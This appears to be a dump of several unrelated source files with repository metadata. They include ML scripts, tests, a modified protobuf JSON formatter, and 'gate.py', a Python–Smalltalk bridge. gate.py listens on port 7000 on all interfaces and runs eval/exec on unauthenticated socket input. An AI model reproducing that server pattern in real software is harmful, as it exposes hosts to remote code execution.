    if rfc_scr > max_score:
        max_score = rfc_scr
        best_m = m
print(best_m, max_score)
print('Applying method...')
# Final model with the tuned hyper-parameters found above.
rfc = RandomForestClassifier(n_estimators=best_n, max_depth=best_m)
print('Creating submission...')
create_submission(rfc, train_data, test_data, predictors, "rfcsurvivors.csv")
print('Submitted.') | 40.012346 | 99 | 0.688985 |
ace744d6cf7a1d8f8c0efb75f037da86f941c3ba | 410 | py | Python | bac/scripts/evaluate_test.py | kaschbacher/bac | 858ebe1bcd61dd6a73431bb651d1b3efa447a8c6 | [
"RSA-MD"
] | 1 | 2021-02-14T04:11:58.000Z | 2021-02-14T04:11:58.000Z | bac/scripts/evaluate_test.py | kaschbacher/bac | 858ebe1bcd61dd6a73431bb651d1b3efa447a8c6 | [
"RSA-MD"
] | 1 | 2021-07-12T10:37:55.000Z | 2021-07-12T10:37:55.000Z | bac/scripts/evaluate_test.py | kaschbacher/bac | 858ebe1bcd61dd6a73431bb651d1b3efa447a8c6 | [
"RSA-MD"
] | null | null | null | import os
import pytest
from click.testing import CliRunner
from bac.scripts.evaluate import main
@pytest.mark.parametrize("config_file", [("configs/config.yml")])
def test_evaluate(config_file):
    """Smoke-test the evaluate CLI entry point with the default config."""
    runner = CliRunner()
    # NOTE(review): mutates process-wide env vars without restoring them,
    # which leaks into other tests in the session; consider monkeypatch.setenv.
    os.environ["MLFLOW_TRACKING_URI"] = "./experiments"
    os.environ["MLFLOW_ARTIFACT_LOCATION"] = ""
    result = runner.invoke(main, [config_file])
    assert result.exit_code == 0
| 25.625 | 65 | 0.731707 |
ace7451415920be5fd1eb8b49593ad505c037bcf | 3,617 | py | Python | py/gate.py | shingarov/PyGate | bac253d88fb905f79d23723e742e1c54820a3ab5 | [
"MIT"
] | null | null | null | py/gate.py | shingarov/PyGate | bac253d88fb905f79d23723e742e1c54820a3ab5 | [
"MIT"
] | null | null | null | py/gate.py | shingarov/PyGate | bac253d88fb905f79d23723e742e1c54820a3ab5 | [
"MIT"
] | null | null | null | """Python Gate server.
"""
import z3
import pdb, traceback
import inspect, sys, json, random
import socket, socketserver
#import angr, archinfo
#from claripy import *
#from pyvex.const import *
#from pyvex.expr import *
#from pyvex.stmt import *
#from pyvex import *
# Gate environment: names bound via the ':' protocol (and RMI activations)
# live in this module-level dict, visible to eval/exec'd requests.
e = {}
class SmalltalkCallbackReturn(Exception):
    """Raised to unwind a nested gate loop when Smalltalk answers a call.

    ``returnValue`` carries the (already deserialized) answer.
    """
    def __init__(self, returnValue):
        # Pass the value through Exception so args/str()/pickling work
        # (the original left args empty, making the exception mute).
        super().__init__(returnValue)
        self.returnValue = returnValue
class PythonGate(socketserver.StreamRequestHandler):
    """Line-oriented TCP handler implementing the Python side of the gate.

    Each request is one line; its first character selects the action:
      '.'  exec the remainder as Python statements
      ':'  arm reception: the NEXT line's payload is stored in the global
           environment dict `e` under the given (rstripped) name
      '^'  deserialize the remainder and unwind via SmalltalkCallbackReturn
      otherwise: eval the line as a Python expression
    """
    def read_one(self):
        # Read a single protocol line and echo it to stdout for tracing.
        requestline = self.rfile.readline().decode()
        sys.stdout.write("> %s" % requestline)
        return requestline
    def write_one(self, answer):
        # Answers are CRLF-terminated and echoed to stdout for tracing.
        ans = answer + '\r\n'
        self.wfile.write(ans.encode())
        sys.stdout.write("< %s" % ans)
        self.wfile.flush()
    def handle_one_packet(self):
        # One request/response round-trip.
        requestline = self.read_one()
        answer = self.getAnswer(requestline)
        self.write_one(answer)
    def handle(self):
        # Request loop; a SmalltalkCallbackReturn raised by getAnswer
        # propagates out of this loop (caught in SmalltalkRMIActivation.perform).
        self.incomingJsonVarName = None
        while True:
            self.handle_one_packet()
    def getAnswer(self, request):
        # A preceding ':' request armed JSON reception: this line is the payload.
        if self.incomingJsonVarName:
            e[self.incomingJsonVarName.rstrip()] = self.deser(request)
            self.incomingJsonVarName = None
            return '+'
        if not request:
            return ''
        if request[0]=='.':
            return self.doExec(request[1:])
        elif request[0]==':':
            # Remember the variable name; the NEXT line carries the value.
            self.incomingJsonVarName = request[1:]
            return ':'
        elif request[0]=='^':
            # Smalltalk returned from a callback: unwind the nested handle() loop.
            raise SmalltalkCallbackReturn(self.deser(request[1:]))
        else:
            return self.doEval(request);
    def doEval(self, request):
        # SECURITY: eval() on raw socket input -- only safe with trusted peers.
        result = eval(request)
        try:
            # 'J' prefix marks a JSON-encoded result.
            return 'J' + json.dumps(result)
        except TypeError:
            # Not JSON-serializable: fall back to an opaque textual description.
            return '+' + self.getNonJSON(result)
    def doExec(self, value):
        # SECURITY: exec() on raw socket input -- only safe with trusted peers.
        # NOTE(review): exec() runs with doExec's locals, so names bound here do
        # not persist between requests; durable state lives in the global dict `e`.
        try:
            exec(value)
            return '+'
        except:
            # Report any failure to the peer as '-' plus the full traceback.
            return '-' + traceback.format_exc()
    def getNonJSON(self, value):
        # Opaque representation for values json.dumps cannot handle.
        if inspect.isclass(value):
            return 'type:' + value.__name__
        return value.__class__.__name__ + ':' + value.__str__()
    def deser(self, serializedString):
        # '!' prefix marks a proxy handle to a Smalltalk-side object.
        if serializedString[0]=='!':
            return SmalltalkObject(self, serializedString[1:])
        return json.loads(serializedString)
class SmalltalkRMIActivation:
    """One pending remote method invocation on a Smalltalk-side object.

    perform() registers this activation in the global env `e`, notifies the
    peer with '!<key>', then re-enters the gate's request loop until the peer
    answers with a '^' line, whose deserialized payload becomes the result.
    """
    def __init__(self, gate, ident, selector, args, kwargs):
        self.gate = gate
        self.ident = ident
        self.selector = selector
        self.args = args
        self.kwargs = kwargs
    def perform(self):
        # Random key keeps concurrently outstanding activations distinct in `e`.
        k = 'rmiAct' + str(random.randint(0,9999999))
        e[k] = self
        self.gate.write_one('!'+k)
        try:
            # Nested request loop: runs until the peer sends '^<json>',
            # which getAnswer turns into SmalltalkCallbackReturn.
            self.gate.handle()
        except SmalltalkCallbackReturn as ex:
            return ex.returnValue
class SmalltalkRMI:
    """A bound remote method: calling the object triggers an RMI round-trip."""

    def __init__(self, gate, ident, selector):
        self.gate = gate
        self.ident = ident
        self.selector = selector

    def __call__(self, *args, **kwargs):
        # Package the call into an activation and run it to completion.
        activation = SmalltalkRMIActivation(
            self.gate, self.ident, self.selector, args, kwargs
        )
        return activation.perform()
class SmalltalkObject:
    """Proxy for an object living on the Smalltalk side of the gate.

    Any attribute access returns a SmalltalkRMI bound to (gate, ident, name),
    so `obj.foo(...)` becomes a remote invocation of selector 'foo'.
    """
    def __init__(self, gate, ident):
        self.gate = gate
        self.ident = ident
    def __getattribute__(self, name):
        # __class__ and __str__ are answered locally so printing and
        # isinstance-style introspection work; every other name -- including
        # 'gate' and 'ident' when read from outside -- is proxied remotely.
        if name=='__class__':
            return SmalltalkObject
        if name=='__str__':
            return object.__getattribute__(self, '__str__')
        # object.__getattribute__ bypasses this hook to reach the real attributes.
        return SmalltalkRMI(object.__getattribute__(self, 'gate'), object.__getattribute__(self, 'ident'), name)
socketserver.TCPServer(('',7000), PythonGate).serve_forever()
| 26.595588 | 112 | 0.603262 |
ace7453f56989ab64be547032360b81566d7fdcc | 751 | py | Python | rv/tests/test_rv.py | weaverba137/rv | 3c7b467c4964bd3ccaa949ab17c7df4c4ba2ac2a | [
"BSD-3-Clause"
] | 1 | 2016-02-09T16:02:26.000Z | 2016-02-09T16:02:26.000Z | rv/tests/test_rv.py | weaverba137/rv | 3c7b467c4964bd3ccaa949ab17c7df4c4ba2ac2a | [
"BSD-3-Clause"
] | null | null | null | rv/tests/test_rv.py | weaverba137/rv | 3c7b467c4964bd3ccaa949ab17c7df4c4ba2ac2a | [
"BSD-3-Clause"
] | null | null | null | # Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
import re
from .. import __version__ as rv_version
class TestRV(object):
"""Test the top-level rv functions.
"""
def setup(self):
self.versionre = re.compile(r'''
([0-9]+!)? # epoch
([0-9]+) # major
(\.[0-9]+)* # minor
((a|b|rc|\.post|\.dev)[0-9]+)?''',
re.X)
def teardown(self):
pass
def test_version(self):
"""Ensure the version conforms to PEP386/PEP440.
"""
assert self.versionre.match(rv_version) is not None
| 28.884615 | 70 | 0.44474 |
ace74576bdd6d620169a5a56fe29a92a6d98fa54 | 5,689 | py | Python | predict.py | XiaoleiDiao/LowLevelVision-Pipeline-pytorch | 5b04fb75641d02638feccefc2eec4cecf495ced2 | [
"MIT"
] | 2 | 2022-03-29T14:03:16.000Z | 2022-03-29T14:03:54.000Z | predict.py | XiaoleiDiao/LowLevelVision-Pipeline-pytorch | 5b04fb75641d02638feccefc2eec4cecf495ced2 | [
"MIT"
] | null | null | null | predict.py | XiaoleiDiao/LowLevelVision-Pipeline-pytorch | 5b04fb75641d02638feccefc2eec4cecf495ced2 | [
"MIT"
] | 1 | 2022-03-29T14:05:16.000Z | 2022-03-29T14:05:16.000Z | import torch
import time
import argparse
from torch.autograd import Variable
from torchvision.utils import make_grid
from models.model_RCRN import GeneratorUNet, Discriminator, weights_init_normal
from datasets import *
from util.TestMetrics import get_PSNR, get_SSIM
# from datasets import skeletonPrepare
########################################
##### Tools Definitions #####
########################################
##### Load weights of the model #####
def loadModel(model):
    """Load the trained weights from opt.model_path into model and move it
    to the best available device (CUDA if present, otherwise CPU)."""
    if torch.cuda.is_available():
        device = torch.device('cuda:0')
    else:
        device = torch.device('cpu')
    state_dict = torch.load(opt.model_path, map_location=device)
    model.load_state_dict(state_dict)
    return model.to(device)
##### Concat input and target pics for visual comparison #####
def concat(imgA, imgB):
    """Paste imgA and imgB side by side (imgA left, imgB right) into a new
    image of mode opt.color_set whose height is imgA's height."""
    widthA, heightA = imgA.size
    widthB, _heightB = imgB.size
    joint = Image.new(opt.color_set, (widthA + widthB, heightA))
    joint.paste(imgA, (0, 0))
    joint.paste(imgB, (widthA, 0))
    return joint
##### Image pre-processing #####
def AdditionalProcess(pic):
    """Pre-process an input picture.

    When opt.IsPre is set the picture is assumed to be an input|target
    combination, and only its right half is kept. Returns the (possibly
    cropped) picture together with its final width and height.
    """
    if opt.IsPre:
        full_width, full_height = pic.size
        pic = pic.crop((full_width / 2, 0, full_width, full_height))
    width, height = pic.size
    return pic, width, height
##### Save a given Tensor into an image file #####
def Get_tensor(tensor, nrow=8, padding=2,
               normalize=False, irange=None, scale_each=False, pad_value=0):
    """Render a (batch of) image tensor(s) into a single PIL image via make_grid."""
    # NOTE(review): released torchvision versions spell this keyword 'range' /
    # 'value_range', not 'irange' -- confirm against the local torchvision,
    # as this call raises TypeError on the stock make_grid API.
    grid = make_grid(tensor, nrow=nrow, padding=padding, pad_value=pad_value,
                     normalize=normalize, irange=irange, scale_each=scale_each)
    # Add 0.5 after unnormalizing to [0, 255] to round to nearest integer
    ndarr = grid.mul_(255).add_(0.5).clamp_(0, 255).permute(1, 2, 0).to('cpu', torch.uint8).numpy()
    im = Image.fromarray(ndarr)
    return im
########################################
##### Image Processing #####
########################################
if __name__ == '__main__':
    ##### arguments settings #####
    parser = argparse.ArgumentParser()
    parser.add_argument("--input_path", type=str, default="data/Dataset1/test", help="path of input pics")
    parser.add_argument("--store_path", type=str, default="data/Dataset1/predict-results/",
                        help="path for stroing the output pics")
    parser.add_argument("--model_path", type=str, default="saved_models/Dataset1/model_RCRN_generator_50.pth",
                        help="path for loading the trained models")
    parser.add_argument("--img_height", type=int, default=256, help="size of image height")
    parser.add_argument("--img_width", type=int, default=256, help="size of image width")
    parser.add_argument("--channels", type=int, default=3, help="number of image channels")
    parser.add_argument("--color_set", type=str, default="RGB", help="number of image color set, RGB or L ")
    # NOTE(review): argparse type=bool treats any non-empty string (even
    # "False") as True, so these two flags are effectively always-on unless
    # an empty string is passed explicitly.
    parser.add_argument("--IsPre", type=bool, default=True, help="If need to make pre-processing on input pics")
    parser.add_argument("--OutputComparisons", type=bool, default=True,
                        help="If need to save side-by-side comparison images")
    parser.add_argument("--dataset_name", type=str, default="Oracles2", help="name of the dataset")
    opt = parser.parse_args()

    ##### Create store_path #####
    os.makedirs(opt.store_path, exist_ok=True)

    ##### Initialize CUDA and Tensor #####
    cuda = torch.cuda.is_available()
    Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor

    ##### data transformations #####
    transforms_ = [
        transforms.Resize((opt.img_height, opt.img_width)),
        transforms.ToTensor(),
        transforms.Normalize([0.5], [0.5])]
    transform = transforms.Compose(transforms_)

    ##### Load the trained generator ONCE, outside the loop #####
    # (The original reloaded the checkpoint from disk for every input image.)
    generator = loadModel(GeneratorUNet())

    ##### Process input pics #####
    pics = os.listdir(opt.input_path)
    for pic in pics:
        # Get pic name and derive the output file names
        name = pic.split(".")[0]
        output_path = os.path.join(opt.store_path, name) + ".png"
        output_path_compare = os.path.join(opt.store_path, name) + "_compare.jpeg"
        # Read pic with PIL and apply pre-processing before feeding the model
        image = Image.open(os.path.join(opt.input_path, pic)).convert(opt.color_set)
        Ori_image, Ori_width, Ori_height = AdditionalProcess(image)
        image = transform(Ori_image)
        # Reshape into (batch, channel, width, height)
        image = image.resize(1, opt.channels, opt.img_width, opt.img_height)
        image = Variable(image.type(Tensor))
        # Time a single forward pass of the generator
        start = time.time()
        output = generator(image)
        end = time.time()
        print("processing time: ", (end - start) * 1000, "ms")
        # Convert the output tensor to PIL and restore the original size
        Output_img = Get_tensor(output.data, normalize=True)
        Output_img = Output_img.resize((Ori_width, Ori_height))
        Output_img.save(output_path)
        # Save the combination of output and input pics for visual comparison
        if opt.OutputComparisons:
            Comparison_img = concat(Output_img, Ori_image)
            Comparison_img.save(output_path_compare)
ace74590a36527f725be7de871e38cc7bd01d473 | 36,865 | py | Python | dingus/codec/json_format.py | ricott1/dingus | ef0edd9fff164f54171b354714e600f410a3bbe9 | [
"MIT"
] | null | null | null | dingus/codec/json_format.py | ricott1/dingus | ef0edd9fff164f54171b354714e600f410a3bbe9 | [
"MIT"
] | null | null | null | dingus/codec/json_format.py | ricott1/dingus | ef0edd9fff164f54171b354714e600f410a3bbe9 | [
"MIT"
] | null | null | null | # Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains routines for printing protocol messages in JSON format.
Only modification is returning hex encoding of bytes type,
rather than base 64.
Simple usage example:
# Create a proto object and serialize it to a json format string.
message = my_proto_pb2.MyMessage(foo='bar')
json_string = json_format.MessageToJson(message)
# Parse a json format string to proto object.
message = json_format.Parse(json_string, my_proto_pb2.MyMessage())
"""
__author__ = "jieluo@google.com (Jie Luo)"
from collections import OrderedDict
import json
import math
from operator import methodcaller
import re
import sys
from google.protobuf.internal import type_checkers
from google.protobuf import descriptor
from google.protobuf import symbol_database
_TIMESTAMPFOMAT = "%Y-%m-%dT%H:%M:%S"
_INT_TYPES = frozenset(
[
descriptor.FieldDescriptor.CPPTYPE_INT32,
descriptor.FieldDescriptor.CPPTYPE_UINT32,
descriptor.FieldDescriptor.CPPTYPE_INT64,
descriptor.FieldDescriptor.CPPTYPE_UINT64,
]
)
_INT64_TYPES = frozenset(
[
descriptor.FieldDescriptor.CPPTYPE_INT64,
descriptor.FieldDescriptor.CPPTYPE_UINT64,
]
)
_FLOAT_TYPES = frozenset(
[
descriptor.FieldDescriptor.CPPTYPE_FLOAT,
descriptor.FieldDescriptor.CPPTYPE_DOUBLE,
]
)
_INFINITY = "Infinity"
_NEG_INFINITY = "-Infinity"
_NAN = "NaN"
_UNPAIRED_SURROGATE_PATTERN = re.compile(
"[\ud800-\udbff](?![\udc00-\udfff])|(?<![\ud800-\udbff])[\udc00-\udfff]"
)
_VALID_EXTENSION_NAME = re.compile(r"\[[a-zA-Z0-9\._]*\]$")
class Error(Exception):
    """Top-level module error for json_format; base of this module's exceptions."""
class SerializeToJsonError(Error):
    """Thrown if serialization of a protobuf message to JSON fails."""
class ParseError(Error):
    """Thrown in case of a JSON parsing error."""
def MessageToJson(
    message,
    including_default_value_fields=False,
    preserving_proto_field_name=False,
    indent=2,
    sort_keys=False,
    use_integers_for_enums=False,
    descriptor_pool=None,
    float_precision=None,
):
    """Serializes a protobuf message to a JSON-formatted string.

    Args:
        message: The protocol buffers message instance to serialize.
        including_default_value_fields: If True, always emit singular
            primitive, repeated, and map fields, even when empty. Singular
            message fields and oneof fields are unaffected.
        preserving_proto_field_name: If True, keep the original .proto field
            names instead of converting them to lowerCamelCase.
        indent: Pretty-print indent level; 0 or negative inserts only newlines.
        sort_keys: If True, sort the output by field names.
        use_integers_for_enums: If True, emit integers instead of enum names.
        descriptor_pool: Descriptor pool for resolving types; default if None.
        float_precision: If set, the number of valid digits for float fields.

    Returns:
        A string with the JSON-formatted protocol buffer message.
    """
    printer = _Printer(
        including_default_value_fields=including_default_value_fields,
        preserving_proto_field_name=preserving_proto_field_name,
        use_integers_for_enums=use_integers_for_enums,
        descriptor_pool=descriptor_pool,
        float_precision=float_precision,
    )
    return printer.ToJsonString(message, indent, sort_keys)
def MessageToDict(
    message,
    including_default_value_fields=False,
    preserving_proto_field_name=False,
    use_integers_for_enums=False,
    descriptor_pool=None,
    float_precision=None,
):
    """Converts a protobuf message to a dictionary (proto3 JSON mapping).

    When the returned dictionary is encoded to JSON it conforms to the
    proto3 JSON specification (modulo this module's hex bytes encoding).

    Args:
        message: The protocol buffers message instance to serialize.
        including_default_value_fields: If True, always emit singular
            primitive, repeated, and map fields, even when empty. Singular
            message fields and oneof fields are unaffected.
        preserving_proto_field_name: If True, keep the original .proto field
            names instead of converting them to lowerCamelCase.
        use_integers_for_enums: If True, emit integers instead of enum names.
        descriptor_pool: Descriptor pool for resolving types; default if None.
        float_precision: If set, the number of valid digits for float fields.

    Returns:
        A dict representation of the protocol buffer message.
    """
    printer = _Printer(
        including_default_value_fields=including_default_value_fields,
        preserving_proto_field_name=preserving_proto_field_name,
        use_integers_for_enums=use_integers_for_enums,
        descriptor_pool=descriptor_pool,
        float_precision=float_precision,
    )
    # pylint: disable=protected-access
    return printer._MessageToJsonObject(message)
def _IsMapEntry(field):
    """Return whether field is the synthesized entry message of a map field."""
    if field.type != descriptor.FieldDescriptor.TYPE_MESSAGE:
        return False
    entry_type = field.message_type
    return entry_type.has_options and entry_type.GetOptions().map_entry
class _Printer(object):
    """JSON format printer for protocol message."""
    def __init__(
        self,
        including_default_value_fields=False,
        preserving_proto_field_name=False,
        use_integers_for_enums=False,
        descriptor_pool=None,
        float_precision=None,
    ):
        self.including_default_value_fields = including_default_value_fields
        self.preserving_proto_field_name = preserving_proto_field_name
        self.use_integers_for_enums = use_integers_for_enums
        self.descriptor_pool = descriptor_pool
        # printf-style format for rounding float fields; None = shortest repr.
        if float_precision:
            self.float_format = ".{}g".format(float_precision)
        else:
            self.float_format = None
    def ToJsonString(self, message, indent, sort_keys):
        # Build the plain-Python object tree first, then dump it in one go.
        js = self._MessageToJsonObject(message)
        return json.dumps(js, indent=indent, sort_keys=sort_keys)
    def _MessageToJsonObject(self, message):
        """Converts message to an object according to Proto3 JSON Specification."""
        message_descriptor = message.DESCRIPTOR
        full_name = message_descriptor.full_name
        # Well-known types (wrappers, Any, Struct, ...) get special handling.
        if _IsWrapperMessage(message_descriptor):
            return self._WrapperMessageToJsonObject(message)
        if full_name in _WKTJSONMETHODS:
            return methodcaller(_WKTJSONMETHODS[full_name][0], message)(self)
        js = {}
        return self._RegularMessageToJsonObject(message, js)
    def _RegularMessageToJsonObject(self, message, js):
        """Converts normal message according to Proto3 JSON Specification."""
        fields = message.ListFields()
        try:
            for field, value in fields:
                if self.preserving_proto_field_name:
                    name = field.name
                else:
                    name = field.json_name
                if _IsMapEntry(field):
                    # Convert a map field.
                    v_field = field.message_type.fields_by_name["value"]
                    js_map = {}
                    for key in value:
                        # JSON object keys must be strings; booleans get the
                        # canonical "true"/"false" spelling.
                        if isinstance(key, bool):
                            if key:
                                recorded_key = "true"
                            else:
                                recorded_key = "false"
                        else:
                            recorded_key = str(key)
                        js_map[recorded_key] = self._FieldToJsonObject(
                            v_field, value[key]
                        )
                    js[name] = js_map
                elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
                    # Convert a repeated field.
                    js[name] = [self._FieldToJsonObject(field, k) for k in value]
                elif field.is_extension:
                    name = "[%s]" % field.full_name
                    js[name] = self._FieldToJsonObject(field, value)
                else:
                    js[name] = self._FieldToJsonObject(field, value)
            # Serialize default value if including_default_value_fields is True.
            if self.including_default_value_fields:
                message_descriptor = message.DESCRIPTOR
                for field in message_descriptor.fields:
                    # Singular message fields and oneof fields will not be affected.
                    if (
                        field.label != descriptor.FieldDescriptor.LABEL_REPEATED
                        and field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE
                    ) or field.containing_oneof:
                        continue
                    if self.preserving_proto_field_name:
                        name = field.name
                    else:
                        name = field.json_name
                    if name in js:
                        # Skip the field which has been serialized already.
                        continue
                    if _IsMapEntry(field):
                        js[name] = {}
                    elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
                        js[name] = []
                    else:
                        js[name] = self._FieldToJsonObject(field, field.default_value)
        except ValueError as e:
            # 'field' is the for-loop variable that raised (Python loop
            # variables remain bound after the loop body).
            raise SerializeToJsonError(
                "Failed to serialize {0} field: {1}.".format(field.name, e)
            )
        return js
    def _FieldToJsonObject(self, field, value):
        """Converts field value according to Proto3 JSON Specification."""
        if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
            return self._MessageToJsonObject(value)
        elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:
            if self.use_integers_for_enums:
                return value
            if field.enum_type.full_name == "google.protobuf.NullValue":
                return None
            enum_value = field.enum_type.values_by_number.get(value, None)
            if enum_value is not None:
                return enum_value.name
            else:
                if field.file.syntax == "proto3":
                    return value
                raise SerializeToJsonError(
                    "Enum field contains an integer value "
                    "which can not mapped to an enum value."
                )
        elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:
            if field.type == descriptor.FieldDescriptor.TYPE_BYTES:
                # Use hex Data encoding for bytes
                # NOTE: deliberate deviation from the proto3 JSON spec, which
                # mandates base64 (see module docstring).
                return value.hex()
            else:
                return value
        elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:
            return bool(value)
        elif field.cpp_type in _INT64_TYPES:
            # 64-bit ints are emitted as strings to survive JS number limits.
            return str(value)
        elif field.cpp_type in _FLOAT_TYPES:
            if math.isinf(value):
                if value < 0.0:
                    return _NEG_INFINITY
                else:
                    return _INFINITY
            if math.isnan(value):
                return _NAN
            if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_FLOAT:
                if self.float_format:
                    return float(format(value, self.float_format))
                else:
                    return type_checkers.ToShortestFloat(value)
        # Fallthrough: int32/uint32 and finite doubles are emitted as-is.
        return value
    def _AnyMessageToJsonObject(self, message):
        """Converts Any message according to Proto3 JSON Specification."""
        if not message.ListFields():
            return {}
        # Must print @type first, use OrderedDict instead of {}
        js = OrderedDict()
        type_url = message.type_url
        js["@type"] = type_url
        sub_message = _CreateMessageFromTypeUrl(type_url, self.descriptor_pool)
        sub_message.ParseFromString(message.value)
        message_descriptor = sub_message.DESCRIPTOR
        full_name = message_descriptor.full_name
        if _IsWrapperMessage(message_descriptor):
            js["value"] = self._WrapperMessageToJsonObject(sub_message)
            return js
        if full_name in _WKTJSONMETHODS:
            js["value"] = methodcaller(_WKTJSONMETHODS[full_name][0], sub_message)(self)
            return js
        return self._RegularMessageToJsonObject(sub_message, js)
    def _GenericMessageToJsonObject(self, message):
        """Converts message according to Proto3 JSON Specification."""
        # Duration, Timestamp and FieldMask have ToJsonString method to do the
        # convert. Users can also call the method directly.
        return message.ToJsonString()
    def _ValueMessageToJsonObject(self, message):
        """Converts Value message according to Proto3 JSON Specification."""
        which = message.WhichOneof("kind")
        # If the Value message is not set treat as null_value when serialize
        # to JSON. The parse back result will be different from original message.
        if which is None or which == "null_value":
            return None
        if which == "list_value":
            return self._ListValueMessageToJsonObject(message.list_value)
        if which == "struct_value":
            value = message.struct_value
        else:
            value = getattr(message, which)
        oneof_descriptor = message.DESCRIPTOR.fields_by_name[which]
        return self._FieldToJsonObject(oneof_descriptor, value)
    def _ListValueMessageToJsonObject(self, message):
        """Converts ListValue message according to Proto3 JSON Specification."""
        return [self._ValueMessageToJsonObject(value) for value in message.values]
    def _StructMessageToJsonObject(self, message):
        """Converts Struct message according to Proto3 JSON Specification."""
        fields = message.fields
        ret = {}
        for key in fields:
            ret[key] = self._ValueMessageToJsonObject(fields[key])
        return ret
    def _WrapperMessageToJsonObject(self, message):
        # Wrapper messages serialize as their single 'value' field.
        return self._FieldToJsonObject(
            message.DESCRIPTOR.fields_by_name["value"], message.value
        )
def _IsWrapperMessage(message_descriptor):
return message_descriptor.file.name == "google/protobuf/wrappers.proto"
def _DuplicateChecker(js):
result = {}
for name, value in js:
if name in result:
raise ParseError("Failed to load JSON: duplicate key {0}.".format(name))
result[name] = value
return result
def _CreateMessageFromTypeUrl(type_url, descriptor_pool):
    """Instantiate an empty message of the type named by a type URL.

    Raises TypeError when the pool has no descriptor for that type.
    """
    db = symbol_database.Default()
    if descriptor_pool is None:
        pool = db.pool
    else:
        pool = descriptor_pool
    # The type name is the last path segment of the URL.
    type_name = type_url.split("/")[-1]
    try:
        message_descriptor = pool.FindMessageTypeByName(type_name)
    except KeyError:
        raise TypeError(
            "Can not find message descriptor by type_url: {0}.".format(type_url)
        )
    return db.GetPrototype(message_descriptor)()
def Parse(text, message, ignore_unknown_fields=False, descriptor_pool=None):
    """Parses a JSON representation of a protocol message into a message.

    Args:
        text: Message JSON representation (str or UTF-8 bytes).
        message: A protocol buffer message to merge into.
        ignore_unknown_fields: If True, do not raise errors for unknown fields.
        descriptor_pool: Descriptor pool for resolving types; default if None.

    Returns:
        The same message passed as argument.

    Raises:
        ParseError: On JSON parsing problems.
    """
    if not isinstance(text, str):
        text = text.decode("utf-8")
    try:
        parsed = json.loads(text, object_pairs_hook=_DuplicateChecker)
    except ValueError as e:
        raise ParseError("Failed to load JSON: {0}.".format(str(e)))
    return ParseDict(parsed, message, ignore_unknown_fields, descriptor_pool)
def ParseDict(js_dict, message, ignore_unknown_fields=False, descriptor_pool=None):
    """Parses a JSON dictionary representation into a message.

    Args:
        js_dict: Dict representation of a JSON message.
        message: A protocol buffer message to merge into.
        ignore_unknown_fields: If True, do not raise errors for unknown fields.
        descriptor_pool: Descriptor pool for resolving types; default if None.

    Returns:
        The same message passed as argument.
    """
    _Parser(ignore_unknown_fields, descriptor_pool).ConvertMessage(js_dict, message)
    return message
_INT_OR_FLOAT = (int, float)
class _Parser(object):
    """JSON format parser for protocol message."""
    def __init__(self, ignore_unknown_fields, descriptor_pool):
        # ignore_unknown_fields: skip unknown JSON keys instead of raising.
        self.ignore_unknown_fields = ignore_unknown_fields
        # descriptor_pool: used to resolve Any type URLs; None = default pool.
        self.descriptor_pool = descriptor_pool
    def ConvertMessage(self, value, message):
        """Convert a JSON object into a message.

        Args:
          value: A JSON object.
          message: A WKT or regular protocol message to record the data.

        Raises:
          ParseError: In case of convert problems.
        """
        message_descriptor = message.DESCRIPTOR
        full_name = message_descriptor.full_name
        # Well-known types (wrappers, Any, Struct, ...) get special handling.
        if _IsWrapperMessage(message_descriptor):
            self._ConvertWrapperMessage(value, message)
        elif full_name in _WKTJSONMETHODS:
            methodcaller(_WKTJSONMETHODS[full_name][1], value, message)(self)
        else:
            self._ConvertFieldValuePair(value, message)
    def _ConvertFieldValuePair(self, js, message):
        """Convert field value pairs into regular message.

        Args:
          js: A JSON object to convert the field value pairs.
          message: A regular protocol message to record the data.

        Raises:
          ParseError: In case of problems converting.
        """
        # Records each JSON key (and each oneof) consumed, to reject duplicates.
        names = []
        message_descriptor = message.DESCRIPTOR
        fields_by_json_name = dict((f.json_name, f) for f in message_descriptor.fields)
        for name in js:
            try:
                # Resolve the field: json_name first, then proto name, then
                # extension syntax "[full.name]".
                field = fields_by_json_name.get(name, None)
                if not field:
                    field = message_descriptor.fields_by_name.get(name, None)
                if not field and _VALID_EXTENSION_NAME.match(name):
                    if not message_descriptor.is_extendable:
                        raise ParseError(
                            "Message type {0} does not have extensions".format(
                                message_descriptor.full_name
                            )
                        )
                    identifier = name[1:-1]  # strip [] brackets
                    # pylint: disable=protected-access
